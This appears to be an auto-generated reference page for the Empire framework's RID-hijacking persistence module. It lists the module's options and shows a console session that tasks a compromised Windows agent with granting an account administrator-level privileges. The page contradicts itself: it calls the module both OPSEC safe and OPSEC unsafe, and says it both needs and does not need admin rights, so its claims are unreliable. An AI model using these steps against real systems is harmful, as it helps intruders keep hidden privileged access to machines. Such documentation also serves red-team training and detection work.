Invoke-RIDHijacking - Empire Module

This page contains detailed information about how to use the powershell/persistence/elevated/rid_hijack Empire module. For list of all Empire modules, visit the Empire Module Library.

Module Overview

---

Name: Invoke-RIDHijacking
Module: powershell/persistence/elevated/rid_hijack
Source code [1]: empire/server/modules/powershell/persistence/elevated/rid_hijack.yaml
Source code [2]: empire/server/data/module_source/persistence/Invoke-RIDHijacking.ps1
MITRE ATT&CK: T1003
Language: PowerShell
Needs admin: Yes
OPSEC safe: Yes
Background: No

The rid_hijack module runs Invoke-RIDHijacking. Allows setting desired privileges to an existent account by modifying the Relative Identifier value copy used to create the access token. This module needs administrative privileges.

This module runs in a foreground and is OPSEC unsafe as it writes on the disk and therefore could be detected by AV/EDR running on the target system.

Note that the rid_hijack module does not need administrative privileges to work properly which means that a normal user can run this module.

Required Module Options

---

This is a list of options that are required by the rid_hijack module:

Agent
Agent to run module on.

Additional Module Options

---

This is a list of additional options that are supported by the rid_hijack module:

Enable
Switch. Enable the defined account.

Password
Password to set to the defined account.

RID
RID to set to the specified account. Default 500.
Default value: 500.

UseGuest
Switch. Set the defined RID to the Guest account.

User
User to set the defined RID.

Rid_hijack Example Usage

---

Here's an example of how to use the rid_hijack module in the Empire client console:

[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/windows/ducky) > usemodule powershell/persistence/elevated/rid_hijack

 Author       Sebastian Castro @r4wd3r                                              
 Background   False                                                                 
 Comments     https://github.com/r4wd3r/RID-Hijacking                               
              https://r4wsecurity.blogspot.com/2017/12/rid-hijacking-maintaining-   
              access-on.html                                                        
              https://csl.com.co/rid-hijacking/                                     
 Description  Runs Invoke-RIDHijacking. Allows setting desired privileges to an     
              existent account by modifying the Relative Identifier value copy used 
              to create the access token. This module needs administrative          
              privileges.                                                           
 Language     powershell                                                            
 Name         powershell/persistence/elevated/rid_hijack                            
 NeedsAdmin   True                                                                  
 OpsecSafe    True                                                                  
 Techniques   http://attack.mitre.org/techniques/T1003                              


,Record Options----,----------,-------------------------------------,
| Name     | Value | Required | Description                         |
|----------|-------|----------|-------------------------------------|
| Agent    |       | True     | Agent to run module on.             |
|----------|-------|----------|-------------------------------------|
| Enable   |       | False    | Switch. Enable the defined account. |
|----------|-------|----------|-------------------------------------|
| Password |       | False    | Password to set to the defined      |
|          |       |          | account.                            |
|----------|-------|----------|-------------------------------------|
| RID      | 500   | False    | RID to set to the specified         |
|          |       |          | account. Default 500.               |
|----------|-------|----------|-------------------------------------|
| UseGuest |       | False    | Switch. Set the defined RID to the  |
|          |       |          | Guest account.                      |
|----------|-------|----------|-------------------------------------|
| User     |       | False    | User to set the defined RID.        |
'----------'-------'----------'-------------------------------------'

(Empire: usemodule/powershell/persistence/elevated/rid_hijack) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/powershell/persistence/elevated/rid_hijack) > execute
[*] Tasked Y4LHEV83 to run Task 1
...

Now wait for the results to come.

Author

---

• Sebastian Castro @r4wd3r

References

---

• https://github.com/BC-SECURITY/Empire/tree/master/empire/server/modules/powershell/persistence/elevated/rid_hijack.yaml
• https://github.com/BC-SECURITY/Empire/tree/master/empire/server/data/module_source/persistence/Invoke-RIDHijacking.ps1
• https://github.com/r4wd3r/RID-Hijacking
• https://r4wsecurity.blogspot.com/2017/12/rid-hijacking-maintaining-access-on.html
• https://csl.com.co/rid-hijacking/
• http://attack.mitre.org/techniques/T1003
• https://gallery.technet.microsoft.com/scriptcenter/Enable-TSDuplicateToken-6f485980
• https://gallery.technet.microsoft.com/scriptcenter/PowerShell-Get-username-fdcb6990

See Also

---

Check also the following modules related to this module:

• powershell/persistence/elevated/wmi_updater
• powershell/persistence/elevated/schtasks
• powershell/persistence/elevated/registry
• powershell/persistence/elevated/wmi
• powershell/privesc/powerup/write_dllhijacker
• powershell/privesc/powerup/find_dllhijack

Version

---

This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.